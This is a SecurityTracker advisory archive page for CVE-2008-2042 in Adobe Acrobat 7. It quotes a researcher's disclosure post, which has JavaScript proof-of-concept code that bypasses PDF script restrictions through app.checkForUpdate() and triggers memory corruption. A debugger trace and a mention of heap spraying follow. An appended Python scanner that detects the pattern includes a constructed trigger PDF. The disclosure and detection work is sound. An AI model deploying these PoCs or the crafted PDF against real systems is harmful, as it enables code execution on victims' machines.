SecurityTracker.com
SecurityTracker
Archives


 






Category:   Application (Generic)  >   Adobe Acrobat/Reader
Vendors:   Adobe Systems Incorporated
Adobe Acrobat Javascript API app.checkForUpdate() Function Lets Remote Users Execute Restricted Functions
SecurityTracker Alert ID:  1019971
SecurityTracker URL:  http://securitytracker.com/id/1019971
CVE Reference:   CVE-2008-2042
Date:  May 7 2008
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): prior to 7.1.0
Description:   A vulnerability was reported in Adobe Acrobat and Adobe Reader. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create a PDF file containing specially crafted javascript that, when loaded by the target user, will invoke the Javascript API app.checkForUpdate() function. This function allows the remote user to execute restricted functions and execute arbitrary code.

Adobe Reader and Adobe Acrobat version 8.x are not affected.

The vendor was notified on November 2, 2007.

cocoruder reported this vulnerability.

Impact:   A remote user can create a PDF file that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:   The vendor has issued a fixed version (7.1.0), available at:

http://www.adobe.com/go/getreader

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb08-13.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb08-13.html
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 27 2008 (Sun Issues Advisory) Adobe Acrobat Javascript API app.checkForUpdate() Function Lets Remote Users Execute Restricted Functions
Sun is working on a fix for Solaris 10.



 Source Message Contents

Date:  Wed, 7 May 2008 09:35:50 +0800
Subject:  [Full-disclosure] Adobe Acrobat Professional Javascript For PDF

Adobe Acrobat Professional Javascript For PDF Security Feature Bypass
and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

    Two critical vulnerabilities exist in the javascript API of Adobe
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
code on the affected system.


Affected Software Versions:

    Adobe Acrobat Professional 7.0.9



Details:

    These two vulnerabilities specifically exist in an unpublicized
function called "app.checkForUpdate()", and are exploited through a
callback function.

    The following is the POC for how to execute restricted functions:

	function	myCallBack()
	{
		app.alert("It will call app.newDoc()");
		app.newDoc();
		app.alert("function has been called");
	}

	app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});


    As we know, when we call "app.newDoc()" normally, the function
cannot be executed because of the security feature of PDF's javascript,
but the above code can still execute this function successfully. Other
restricted functions can also be executed by exploiting this
vulnerability.

    The POC for triggering the memory corruption vulnerability:

	function	myCallBack()
	{
		app.alert("Corrupting the memory");

		// Open a new report will corrupt the memory
		var rep = new Report();

		app.alert("If the application has not been crashed, try to close the application and then you will get it.");
	}

	app.checkForUpdate
	({
		cType:"AAAA",
		cName:"BBBB",
		oCallback:myCallBack,
		cVer:"CCCC",
		cMsg:"DDDD",
		oParams:myCallBack
	});


    When we call the function "new Report()" (other functions may be
useful too) in the callback function, it will corrupt the memory.
Debug information from Windbg follows:

	First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
	eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0         nv up ei pl nz na po nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl          ds:0023:00000040=??
	0:000> u eip
	exlang32+0x101010:
	10101010 001b            add     byte ptr [ebx],bl
	10101012 6c              ins     byte ptr es:[edi],dx
	10101013 0000            add     byte ptr [eax],al
	10101015 1b640000        sbb     esp,dword ptr [eax+eax]
	10101019 336000          xor     esp,dword ptr [eax]
	1010101c 0033            add     byte ptr [ebx],dh
	1010101e 60              pushad
	1010101f 0000            add     byte ptr [eax],al

    It is running code at an unexpected address.

    Using the heap spray technique of javascript in PDF, one can develop
a working exploit for this vulnerability easily.

    Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, in my testing the vulnerability does NOT affect Adobe
Reader/Acrobat 8.



Solution:

    Adobe has released an advisory for this vulnerability which is available on:

    http://www.adobe.com/support/security/bulletins/apsb08-13.html

    Fortinet advisory can be found at:

    http://www.fortiguardcenter.com



CVE Information:

    CVE-2008-2042



Disclosure Timeline:

    2007.11.01        Vendor notified via email
    2007.11.02        Vendor responded
    2008.05.06        Coordinated public disclosure



--EOF--

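As an added example (not part of the SecurityTracker advisory or of cocoruder's post), this Python scanner extracts embedded JavaScript from a PDF, whether stored as a literal string, a hex string or a Flate-compressed stream, and flags scripts that pass an oCallback to the undocumented app.checkForUpdate() API described above. The function names and the sample PDFs are constructed for this example.

```python
import re
import zlib
# JS can be stored as a literal (...), hex <...> or a stream; the literal regex allows one nested () level.
_JS_LITERAL = re.compile(rb"/JS\s*\(((?:[^()\\]|\\.|\([^()]*\))*)\)", re.S)
_JS_HEX = re.compile(rb"/JS\s*<([0-9A-Fa-f\s]*)>")
_STREAM = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
_CALL = re.compile(rb"app\s*(?:\.\s*checkForUpdate|\[\s*['\"]checkForUpdate['\"]\s*\])")  # dotted or bracket
_CALLBACK = re.compile(rb"oCallback\s*:")
_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}

def decode_literal(raw: bytes) -> bytes:
    """Undo PDF literal-string escapes: \\( \\) \\\\ \\n \\ddd and backslash-newline continuations."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i:i + 1] != b"\\":
            out += raw[i:i + 1]; i += 1; continue
        nxt = raw[i + 1:i + 2]
        if nxt and nxt in b"01234567":                       # octal escape, up to three digits
            m = re.match(rb"[0-7]{1,3}", raw[i + 1:i + 4])
            out.append(int(m.group(), 8) & 0xFF); i += 1 + len(m.group())
        elif nxt in (b"\n", b"\r"):                          # line continuation: drop both bytes
            i += 2
        else:                                                # \n \r \t \b \f, or \( \) \\ \x -> x
            out += _ESCAPES.get(nxt, nxt); i += 2
    return bytes(out)

def extract_js(pdf: bytes) -> list:
    """Collect every JavaScript body in the file, whichever encoding the producer used."""
    found = [decode_literal(m.group(1)) for m in _JS_LITERAL.finditer(pdf)]
    for m in _JS_HEX.finditer(pdf):
        h = re.sub(rb"\s", b"", m.group(1))
        found.append(bytes.fromhex((h + b"0" * (len(h) % 2)).decode()))  # odd length pads with 0
    for m in _STREAM.finditer(pdf):                          # /JS may reference a stream object
        try:
            found.append(zlib.decompress(m.group(1)))        # FlateDecode stream
        except zlib.error:
            found.append(m.group(1))                         # not compressed; inspect raw bytes
    return found

def is_suspicious(js: bytes) -> bool:
    """True when a script calls app.checkForUpdate() with an oCallback, the shape of the bypass."""
    return bool(_CALL.search(js) and _CALLBACK.search(js))
def scan_pdf(pdf: bytes) -> dict:  # number of scripts found plus the bodies matching the pattern
    scripts = extract_js(pdf)
    return {"scripts": len(scripts), "hits": [s for s in scripts if is_suspicious(s)]}
# Constructed samples (not real malware): the OpenAction script below has the advisory's shape and is
# stored as a PDF literal string, so its parentheses are backslash-escaped the way a PDF writer emits them.
MALICIOUS_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
                 b"2 0 obj << /S /JavaScript /JS (function cb\\(\\) { app.newDoc\\(\\); }\n"
                 b"app.checkForUpdate\\({ cType: \"A\", oCallback: cb, oParams: cb }\\);) >> endobj\n%%EOF\n")
BENIGN_PDF = b"%PDF-1.4\n2 0 obj << /S /JavaScript /JS (app.alert\\(\"hello\"\\);) >> endobj\n%%EOF\n"
```

Any call to app.checkForUpdate() is already unusual in a legitimate document, so a stricter deployment could drop the oCallback requirement in is_suspicious() and alert on the call alone.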

 
 


Copyright 2014, SecurityGlobal.net LLC